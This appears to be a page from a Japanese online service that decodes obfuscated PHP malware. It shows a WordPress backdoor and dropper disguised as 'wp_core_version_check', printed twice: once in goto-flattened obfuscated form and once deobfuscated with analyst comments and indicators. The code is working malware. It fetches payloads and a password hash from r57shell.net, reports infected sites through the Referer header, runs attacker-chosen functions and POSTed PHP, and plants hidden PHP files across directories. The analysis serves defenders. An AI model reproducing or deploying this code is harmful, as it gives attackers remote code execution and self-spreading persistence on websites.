WordPress などで見つかった PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php
// Sample as captured: this is the same wp_core_version_check() routine that appears in readable,
// linearized form further down this page.
// The obfuscation is control-flow flattening: statements are shuffled and chained with `goto` and
// random labels, so textual order is not execution order. Execution begins at label QHTmE (the
// target of the first statement in the function body) and follows each `goto` from there.
// String literals stay in cleartext apart from escape sequences such as \xa, so the remote host
// name, the request parameter names and the dropped-file names visible below can be matched
// directly when scanning a file tree or reviewing logs.
// NOTE(review): a few string literals span physical lines in this capture (likely an artefact of
// how escape sequences were rendered); the line breaks are kept exactly as captured.
if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . 
".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. 
-->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?><?php
if (!function_exists("wp_core_version_check")) {
/**
 * Deobfuscated WordPress backdoor and dropper (analysis notes for defenders).
 *
 * The function name resembles a WordPress core routine, presumably so the code is
 * overlooked during a casual review. It takes no parameters and returns nothing;
 * every input comes from $_SERVER, $_GET and $_POST.
 *
 * Behaviour visible in this listing, in execution order:
 *  1. Derives the site document root from SCRIPT_FILENAME and REQUEST_URI.
 *  2. Builds a cache path "sess_" . md5(host . "_" . script) in the system temp
 *     directory, or next to the script when the temp directory is not writable.
 *  3. Command mode (GET "slince_golden" set): fetches an expected hash from the remote
 *     host and, if md5(sha1(GET "is")) matches it, offers three actions: call an
 *     arbitrary function, drop a downloaded file, include POSTed PHP. Always exits.
 *  4. Otherwise: downloads a payload (or reuses the cached copy) and writes it as a
 *     hidden ".<dirname>.php" file into first- and second-level directories under the
 *     document root.
 *
 * Indicators taken from this listing, usable for file, log and egress review:
 *  - outbound plain-HTTP requests to r57shell.net (jquery.php, mini_admin.txt)
 *  - request parameters slince_golden, is, f, c, m (GET) and l (POST)
 *  - files named sess_<md5 hex> in the temp directory or beside an infected script
 *  - files named .<dirname>.php inside directories, and files ending in gagal.php
 *
 * Cleanup has to cover every directory the spreading loop can reach and the sess_
 * cache file, not only the file in which this function was found.
 */
function wp_core_version_check()
{
// Filesystem path of the currently executing script and the URI that was requested.
$document_file = $_SERVER["SCRIPT_FILENAME"];
$request_uri = $_SERVER["REQUEST_URI"];
$parse_url = parse_url($request_uri);
$uri_path = $parse_url["path"];
// Directory part of the request path, converted to the OS separator so it can be
// removed from the script's filesystem directory below.
$uri_path = dirname($uri_path);
$file_path = dirname($document_file);
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
// A request served from the web root has nothing to strip; otherwise the URI
// directory is removed from the script directory to obtain the document root.
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, '', $file_path);
}
// Host header with every "www." occurrence removed; used only in the cache file name.
$hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]);
// Cache file for the downloaded payload. NOTE(review): the "sess_" prefix resembles
// PHP's session file naming, presumably so the file blends in; compare against the
// host's real session files when hunting for it.
if (is_writable(sys_get_temp_dir())) {
$tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
} else {
$tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . '');
}
// Command mode: any truthy "slince_golden" GET parameter enters this branch.
// Access-log entries carrying this parameter name are a direct indicator.
if (@$_GET["slince_golden"]) {
// Printed before any check. NOTE(review): the text matches the comment used in
// WordPress stub index.php files, so the response looks like an empty page.
echo "<!-- //Silence is golden. -->";
// The expected credential hash is fetched from the remote host over plain HTTP on
// every command request; it is not stored on the compromised site in this branch.
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
}
// Gate: md5(sha1(GET "is")) is compared (loose ==) with the fetched value.
if (md5(sha1(@$_GET["is"])) == $response) {
// Action 1: calls the function named in GET "f" with GET "c" as its single
// argument and prints the result, i.e. arbitrary function execution as the
// web server user.
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
// Action 2: downloads mini_admin.txt from the remote host and writes it to
// <GET "m">gagal.php. The path prefix is request-controlled, so the dropped file
// can land anywhere the PHP process can write; the written path is echoed back.
if (@$_GET["m"]) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
} else {
$response = file_get_contents("http://r57shell.net/mini_admin.txt");
}
$file_name_path = @$_GET["m"] . "gagal.php";
@file_put_contents($file_name_path, $response);
echo $file_name_path;
}
// Action 3: writes POST "l" to a tmpfile() handle and include()s it, so the request
// body runs as PHP. tmpfile() storage is removed on fclose(), so this path leaves no
// named file behind; the POST request itself is the evidence to look for.
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
$tmp = tmpfile();
$tmpf = stream_get_meta_data($tmp);
$tmpf = $tmpf["uri"];
fwrite($tmp, $request);
$ret = (include $tmpf);
fclose($tmp);
return $ret;
}
print_r(basic_code_extensions($_POST["l"]));
}
}
// Command mode always stops here, whether or not the gate matched; the spreading
// logic below runs only for requests without "slince_golden".
exit;
}
// Ordinary page load, no cache file yet: download the payload.
if (!file_exists($tmp_file)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The Referer carries this site's host and request URI to the remote server,
// presumably so the operator learns which site and URL is infected.
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
// Same request through the stream wrapper when the curl extension is unavailable.
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
// Cache the payload; the @ operator hides any write failure from logs and output.
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
} else {
// Cache file exists: reuse it unless it lacks the "stt1" marker, in which case the
// payload is downloaded again and the cache is overwritten.
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
$response = curl_exec($ch);
curl_close($ch);
} else {
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
$opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n")));
$context = stream_context_create($opts);
$response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context);
}
@touch($tmp_file);
@file_put_contents($tmp_file, $response);
}
}
// Spreading: every directory directly under the document root receives the payload as
// a dot-prefixed file named after the directory (".<dirname>.php"), which default
// directory listings hide. The payload contents are not shown on this page.
$dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
// Second level: the same file is written into each sub-directory whose path does not
// contain "wp-content". The inner loop reuses the names $dirs and $d.
$dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR));
foreach ($dirs as $d) {
if (!@preg_match("#wp-content#", $d)) {
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
}
}
}
}
wp_core_version_check();
}